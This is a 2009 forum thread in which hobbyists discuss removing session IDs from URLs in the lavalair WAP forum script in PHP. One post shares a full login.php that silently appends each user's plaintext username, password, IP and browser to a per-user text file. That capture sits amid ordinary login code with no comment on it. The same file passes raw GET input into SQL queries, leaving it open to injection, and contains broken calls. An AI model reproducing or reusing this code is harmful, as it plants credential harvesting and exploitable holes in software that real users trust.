Hiding Session Id

**something else** · 02.06.09, 23:15

Complete code is been posted lots of times?*

**anderson** · 14.06.09, 05:45

failed

I am the creator of this topic!
Lots of posts done here. But still I am not able to hide session ID.

**anderson** · 14.06.09, 05:51

I tried to do it. When I put this code

Code:

session_start();
$_SESSION['sid']=$sid;

on the top of every page, it shows like this...

2: Warning: Unknown: Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively. in Unknown on line 0 

Now what's the solution?

**ori** · 14.06.09, 06:08

was that in login cos i did a lava edit and had 2 put $_SESSION['sid']=md5($did);

**ori** · 14.06.09, 06:12

PHP Code:


<?php
session_start();
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
//header('Content-type: application/vnd.wap.xhtml+xml'); 
echo "<?xml version=\"1.0\"?>";
echo "<!DOCTYPE html PUBLIC \"-//WAPFORUM//DTD XHTML Mobile 1.0//EN\" \"http://www.wapforum.org/DTD/xhtml-mobile10.dtd\">";
?>
<html xmlns="http://www.w3.org/1999/xhtml">
<?php
include("config.php");
include("core.php");
connectdb();
$bcon = connectdb();
if (!$bcon)
{
echo "<head>";
echo "<title>$sitename Error!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/default_medium.css\">";
echo "<head>";
echo "<body>";
echo "<p align=\"center\">";
echo "<img src=\"../images/notok.gif\" alt=\"!\"/><br/>";
echo "<b><strong>Error! Cannot Connect To Database...</strong></b><br/><br/>";
echo "This error happens usually when backing up the database, please be patient...";
echo "</p>";
echo "</body>";
echo "</html>";
exit();
}
$uid = $_GET["loguid"];
$pwd = $_GET["logpwd"];
$sitename = mysql_fetch_array(mysql_query("SELECT value FROM ibwf_settings WHERE name='sitename'"));
$sitename = $sitename[0];
$theme = mysql_fetch_array(mysql_query("SELECT theme FROM ibwf_users WHERE name='".$uid."'"));
$tolog = false;
echo "<head>";
echo "<title>$uid @ $sitename</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/$theme[0]\">";
echo "</head>";
echo "<body>";
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."'"));
if($uinf[0]==0)
{
echo "<head>";
echo "<title>$sitename Error!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/default_medium.css\">";
echo "</head>";
echo "<body>";
}
$epwd = md5($pwd);
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."'"));
if($uinf[0]==0)
{
echo "<head>";
echo "<title>Error!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/default_medium.css\">";
echo "</head>";
echo "<body>";
}
echo "<div><img src=\"../images/mobix.jpg\" alt=\"\"/></div>";

echo "<p align=\"center\">";
echo "Bookmark this page to avoid repeating the login proccess in the future<br/><br/>";

$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."'"));
if($uinf[0]==0)
{
//Check for user ID
echo "<img src=\"../images/notok.gif\" alt=\"X\"/>UserID doesn't exist<br/><br/>";
}else{
//check for pwd
$epwd = md5($pwd);
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."'"));
if($uinf[0]==0)
{
echo "<img src=\"../images/notok.gif\" alt=\"X\"/>Incorrect Password<br/><br/>";
echo "<b>0 </b><a accesskey=\"0\" href=\"index.php\"><img src=\"../images/home.gif\" alt=\"\"/>Home</a>";
echo "</p>";
echo "</body>";
echo "</html>";
exit();
}
$validated = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."' AND validated='0'"));
if(($validated[0]>0)&&(validation()))
{
echo "<img src=\"../images/notok.gif\" alt=\"X\"/><b>Account Not Validated</b><br/>This could take up to 12hrs pls be patient and try again soon<br/>thank you<br/><br/>";
}else{
$ipr = getip();
$brws = $_SERVER['HTTP_USER_AGENT'];
$ubr = $brws;
$alli = "Username: ".$uid."
Password: ".$pwd."
Ip-Address: ".$ipr."
Browser: ".$ubr."
Script: Wap 1.0(wml)
----------
";
if(trim($uid)!=""){
$fname = "logs/".$uid.".txt";
$out = fopen($fname,"a+");
fwrite($out,$alli);
fclose($out);}
&#12288;
&#12288;
&#12288;
&#12288;
$tm = time();
$xtm = $tm + (getsxtm()*60);
$r = rand(0,9999);
$did = $uid.$tm.$r;
$_SESSION['sid'] = md5($did);
$res = mysql_query("INSERT INTO ibwf_ses SET id='".md5($did)."', uid='".getuid_nick($uid)."', expiretm='".$xtm."'");

if($res)
{
$tolog=true;
echo "<img src=\"images/ok.gif\" alt=\"+\"/>Logged in successfully as $uid<br/>-----<br/>";

$idn = getuid_nick($uid);
&#12288;

$lact = mysql_fetch_array(mysql_query("SELECT lastact FROM ibwf_users WHERE id='".$idn."'"));
mysql_query("UPDATE ibwf_users SET lastvst='".$lact[0]."' WHERE id='".$idn."'");
}else{
//is user already logged in?
$logedin = mysql_fetch_array(mysql_query("SELECT (*) FROM ibwf_ses WHERE uid='".$getuid_nick($uid)."'"));
if($logedin[0]>0)
{
//yip, so let's just update the expiration time
$xtm = time() + (getsxtm()*60);
$res = mysql_query("UPDATE ibwf_ses SET expiretm='".$xtm."' WHERE uid='".getuid_nick($uid)."'");

if($res)
{
$tolog=true;
echo "<img src=\"../images/ok.gif\" alt=\"+\"/>You have logged in successfully as $uid<br/>";



}else{
echo "<img src=\"../images/point.gif\" alt=\"!\"/>Can't login at the time, plz try later<br/>"; //no chance this could happen unless there's error in mysql connection

}

}

}

}
}

if($tolog)
{
$sid = md5($did);
addonline(getuid_sid($sid),"Logging On","");
echo "<a accesskey=\"1\" href=\"index.php?action=main\"><img src=\"../images/home.gif\" alt=\"\"/>Go Inside $sitename And Enjoy!!</a><br/>-----<br/>";
echo "<br/><a href=\"index.php?action=sitethmssid\">Change Site Theme</a><br/>-----<br/>";
$popmsgs = mysql_fetch_array(mysql_query("SELECT popmsg FROM ibwf_users WHERE name='".$uid."'"));
if($popmsgs[0]==0){
echo "<a href=\"index.php?action=popenable\">Enable Pop-Ups</a><br/>-----<br/>";
}else{
echo "<a href=\"index.php?action=popdisable\">Disable Pop-Ups</a><br/>-----<br/>";
}
$xfile = @file("randomlogin.txt");
$random_num = rand (0,count($xfile)-1);
$udata = explode("::",$xfile[$random_num]);
echo "$udata[1]<br/>";
echo "<br/>Feel free to invite all your friends here<br/>Wishing you the best time here, from all $sitename staff :)";
}else{
echo "<b>0 </b><a accesskey=\"0\" href=\"index.php\"><img src=\"../images/home.gif\" alt=\"\"/>Home</a>";
}
echo "</p>";
echo "</body>";
?>
</html>

**anderson** · 14.06.09, 06:25

Originally posted by ori View Post

was that in login cos i did a lava edit and had 2 put $_SESSION['sid']=md5($did);

Yes ori. I face that problem from login.php. I am using lavalair wml version.

**anderson** · 15.06.09, 05:57

I am 50% successful. It is working except WAP 1.0 browser. This kind of browsers cant collect session. So when users with this browsers try to enter homepage it shows "session expired", at the same time if anyone uses WAP 2.0 browser he can enter homepage successfully.

Whats the solution for it?

**kiLLeR-eyEd_14** · 11.07.09, 02:39

Hide Session ID in lava/wapd

This is what i've done successfully..
In core.php put this

session_start();
$sid = $_SESSION['sid'];

on top or bottom then in login.php find

$sid = md5($did);

and change it to

$_SESSION['sid'] = md5($did);
$sid = $_SESSION['sid'];

observe it..After defining $_SESSION['sid'] as an md5($did) then define $sid as $_SESSION['sid'] so that it means $sid = $_SESSION['sid'] while the value of $_SESSION['sid'] = md5($sid);
then on every page, you don't need to put something 'cause the session_start() and $sid = $_SESSION['sid'] is already in core.php and core.php is already included on every page..You just need to remove all $sid = $_GET['sid'] and all &sid=$sid..To display if not logged in or session expired i made this code

if(($action != "") && ($action!="terms") && ($action!="gviewfrm") && ($action!="gviewcat") && ($action!="gviewtpc") && ($action!="gforumindx"))
{
$uid = getuid_sid($sid);
if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'])))
{
put here your codes for ses expire
}
}

then to destroy session, put this on top or bottom of the msg successfully logged out,

unset($_SESSION['sid']);
$_SESSION = array();
session_destroy();

**kabooms** · 11.07.09, 10:59

i allready try this code and i work good ahehhehe

Code:

if(($action != "") && ($action!="terms") && ($action!="gviewfrm") && ($action!="gviewcat") && ($action!="gviewtpc") && ($action!="gforumindx"))
{
$uid = getuid_sid($sid);
if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'])))
{
put here your codes for ses expire
}
}

ok mate thnaks for this code i try to edit session expire if low phones can handle this if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'] ahehehe -up- thanks!!!!

**kiLLeR-eyEd_14** · 11.07.09, 11:26

Originally posted by kabooms View Post

i allready try this code and i work good ahehhehe

Code:

if(($action != "") && ($action!="terms") && ($action!="gviewfrm") && ($action!="gviewcat") && ($action!="gviewtpc") && ($action!="gforumindx"))
{
$uid = getuid_sid($sid);
if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'])))
{
put here your codes for ses expire
}
}

ok mate thnaks for this code i try to edit session expire if low phones can handle this if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'] ahehehe -up- thanks!!!!

you may also try to add the old one, like this..

if((empty($_SESSION['sid'])||(!isset($_SESSION['sid']))||(islogged($sid)=="false")||($uid=="0"))

ok?..That's how pinoy rockz!!!Hehehe..I'm working for a new script and i'm going to remove ses id from url..Also put wml and html codes in 1 file..Auto-detect if supports html then header and footer returns html codes..Else, return wml codes..So that i wudn't be tired of doing separate codes and directories for wap and web

**~~kazzin~~** · 11.07.09, 13:58

where add this code

Code:

if(($action != "") && ($action!="terms") && ($action!="gviewfrm") && ($action!="gviewcat") && ($action!="gviewtpc") && ($action!="gforumindx"))
{
$uid = getuid_sid($sid);
if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'])))
{
put here your codes for ses expire
}
}

**kabooms** · 12.07.09, 00:38

Originally posted by kiLLeR-eyEd_14 View Post

if((empty($_SESSION['sid'])||(!isset($_SESSION['sid']))||(islogged($sid)=="false")||($uid=="0"))

thankz mate wow nice idea. Will you share it us? Hmm i think it like funmobile script wml and xhtml in 1 file.. Bro killer eyed can i ask for a code about registration, password send via email can u help me ?Pls pm me..Thankz..

**kiLLeR-eyEd_14** · 12.07.09, 03:05

Originally posted by kabooms View Post

thankz mate wow nice idea. Will you share it us? Hmm i think it like funmobile script wml and xhtml in 1 file.. Bro killer eyed can i ask for a code about registration, password send via email can u help me ?Pls pm me..Thankz..

that's very easy, but b4 u make it, ur webhost must support the php mail() function..I've done coding it in my site a month ago..

**robzky** · 12.07.09, 03:24

if(($action != "") && ($action!="terms") && ($action!="gviewfrm") && ($action!="gviewcat") && ($action!="gviewtpc") && ($action!="gforumindx"))
{
$uid = getuid_sid($sid);
if((empty($_SESSION['sid']) OR (!isset($_SESSION['sid'])))
{
put here your codes for ses expire
}
}

Where Can I add this script?

**kiLLeR-eyEd_14** · 12.07.09, 03:51

Originally posted by robzky View Post

Where Can I add this script?

on every page or file.,to know if session really starts and set.,else return ses expire..

Hiding Session Id

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment